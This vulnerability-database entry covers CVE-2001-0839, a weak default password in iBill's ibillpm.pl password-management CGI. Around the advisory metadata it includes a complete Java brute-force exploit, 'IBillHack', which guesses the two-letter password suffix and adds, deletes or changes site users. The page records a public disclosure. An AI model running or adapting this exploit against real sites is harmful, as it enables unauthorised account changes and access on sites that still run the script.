CVE-2001-0839
CVSS 7.5
Published: 2001-12-06 00:00:00
Last revised: 2016-10-17 22:12:16

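[Original] ibillpm.pl in iBill password management system generates weak passwords based on a client's MASTER_ACCOUNT, which allows remote attackers to modify account information in the .htpasswd file via brute force password guessing.


[CNNVD] iBill Management Script Weak Hard-Coded Password Vulnerability (CNNVD-200112-080)

        ibillpm.pl in the iBill password management system generates weak passwords based on the client's MASTER_ACCOUNT. A remote attacker can guess the password by brute force and thereby modify account information in the .htpasswd file.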

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

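- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0839
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0839
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-080
(official data source) CNNVD

- Other links and resources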

http://marc.info/?l=bugtraq&m=100404371423927&w=2
(UNKNOWN)  BUGTRAQ  20011025 Weak authentication in iBill's Password Management CGI
http://www.securityfocus.com/bid/3476
(UNKNOWN)  BID  3476
http://xforce.iss.net/static/7352.php
(UNKNOWN)  XF  ibillpm-cgi-insecure-password(7352)

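- Vulnerability information

iBill Management Script Weak Hard-Coded Password Vulnerability
High risk  Design error
2001-12-06 00:00:00 2005-10-20 00:00:00
Remote
        ibillpm.pl in the iBill password management system generates weak passwords based on the client's MASTER_ACCOUNT. A remote attacker can guess the password by brute force and thereby modify account information in the .htpasswd file.

- Advisories and patches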

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (21129)

iBill Management Script Weak Hard-Coded Password Vulnerability (EDBID:21129)
cgi remote
2001-10-25 Verified
0 MK Ultra
N/A
source: http://www.securityfocus.com/bid/3476/info

iBill is an Internet billing company that provides secure payment processing for e-commerce.

A vulnerability exists in iBill's CGI password management script called ibillpm.pl. The default password is the client's MASTER_ACCOUNT name plus two lower case letters. The MASTER_ACCOUNT name can be determined by viewing the HTML source of the site's sign-up pages. 

// 10/25/2001

import java.net.*;
import java.io.*;

/**
* IBillHack class for informational purposes only.
* This program brute-forces POST requests to the iBill Password Management CGI
* and allows us to add/delete usernames and change passwords on websites 
* that used iBill Password Management using default installation.
* By default iBill sets up the $authpwd as MASTER_ACCOUNTxx, where "xx" 
* is a pair of letters [a-z]. It is suggested that all clients of iBill 
* that use Password Management acquire a new $authpwd for their ibillpm.pl 
* script.
* MASTER_ACCOUNT can be found as part of the <FORM> tag on the signup pages:
* <input type="hidden" name="account" value="123456-500">
* OR
* <input type="hidden" name="account" value="123456500">
* The last 3 digits are the sub-account, and sometimes there is a dash, 
* sometimes not. In this case MASTER_ACCOUNT=123456.
*
* /cgi-bin/ibillpm.pl is the default path to the CGI. Sometimes the webmaster 
* is smart enough not to use the default and request that $authpwd be changed
* to something more secure. In addition to these measures, a webmaster can 
* also modify their httpd.conf to only allow iBill IP addresses to request 
* the Password Management CGI script.
* 
* The correct $authpwd is not saved here. That is an optional exercise for 
* the reader. 
*
* Here are the return codes from the ibillpm.pl script (not HTTP status codes) 
* and their meaning:
* 
* 501 - authentication failed
* 502 - invalid request type (command must be add, delete, or chgpwd)
* 503 - failed to locate the password file
* 504 - failed to open the password file
* 505 - specified user already exists
* 506 - specified user doesn't exist
* 507 - invalid username
* 508 - invalid password
*
* 201 - add user success
* 202 - delete user success
* 203 - change password success
*
*/

public class IBillHack {

    public static void main(String args[]) {
        if (args.length != 6) {
            System.err.println("Usage: java IBillHack <target_hostname> </path/to/cgi-bin/ibillpm.pl> " + 
                        "<add|delete|chgpwd> <username> <password> <master_account>");
            System.err.println("Example: java IBillHack www.somesite.com /cgi-bin/ibillpm.pl add bob 1pass 123456");
            System.exit(1);
        } 

        char letters[] = {
            'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 
            'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
        };

        for (int i = 0; i < letters.length; i++) {
            for (int j = 0; j < letters.length; j++) {
                try {
                    Socket s = new Socket(InetAddress.getByName(args[0]), 80);
                    StringBuffer headers = new StringBuffer();

                    headers.append("POST " + args[1] + " HTTP/1.1\n");
                    headers.append("Referer: http://" + args[0] + args[1] 
                                   + "\n");
                    headers.append("Content-Type: application/x-www-form-urlencoded\n");
                    headers.append("User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)\n");
                    headers.append("Host: " + args[0] + "\n");

                    StringBuffer query = new StringBuffer();

                    query.append("\nauthpwd=" + args[5] + letters[i] 
                                 + letters[j] + "&reqtype=" + args[2] 
                                 + "&username=" + args[3] + "&password=" 
                                 + args[4] + "&submit=Submit\n");

                    String q = query.toString();

                    headers.append("Content-Length: " + q.length() + "\n");

                    OutputStream os = 
                        new BufferedOutputStream(s.getOutputStream());

                    os.write(headers.toString().getBytes());
                    os.write(q.getBytes());
                    os.flush();

                    System.err.println("Sending...");
                    System.out.print(headers.toString());
                    System.out.println(q);

                    s.close();

                    Thread.sleep(500);
                } catch (Exception e) {
                    e.printStackTrace();
                } 
            } 
        } 

        System.err.println("--------------------------------------------------------------------");
        System.err.println("Finished trying all aa-zz combinations for MASTER_ACCOUNT " + args[5]);
        System.err.println("Try logging into the members section of " + args[0] + " with username/password " + args[3] + "/" + args[4]);
        System.err.println("--------------------------------------------------------------------");
    } 

}
		

- Vulnerability information

13978
iBill ibillpm.pl Default Password Generation Weakness
Local / Remote Cryptographic
Loss of Integrity Solution Unknown
Exploit Public

- Vulnerability description

- Timeline

2001-10-25 Unknown
2001-10-25 Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

iBill Management Script Weak Hard-Coded Password Vulnerability
Design Error 3476
Yes No
2001-10-25 12:00:00 2009-07-11 09:06:00
This vulnerability was discovered and posted to BugTraq by MK Ultra <mkultra@dqc.org>.

- Affected program versions

iBill Internet Billing Company Processing Plus 0

- Vulnerability discussion

iBill is an Internet billing company that provides secure payment processing for e-commerce.

A vulnerability exists in iBill's CGI password management script called ibillpm.pl. The default password is the client's MASTER_ACCOUNT name plus two lower case letters. The MASTER_ACCOUNT name can be determined by viewing the HTML source of the site's sign-up pages.

- Exploit

The following exploit was provided by MK Ultra <mkultra@dqc.org>

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

 

 
